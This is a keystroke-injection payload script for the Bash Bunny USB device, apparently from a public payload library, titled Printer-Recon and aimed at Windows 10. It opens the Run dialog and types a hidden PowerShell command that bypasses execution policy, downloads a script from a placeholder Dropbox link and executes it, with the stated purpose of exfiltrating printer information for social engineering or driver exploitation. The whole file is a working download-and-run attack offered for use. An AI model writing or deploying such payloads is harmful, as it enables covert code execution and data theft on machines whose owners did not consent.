Files
bashbunny-payloads/payloads/library/exfiltration/Printer-Recon/payload.txt
2022-11-14 22:41:01 -05:00

17 lines
668 B
Plaintext

REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1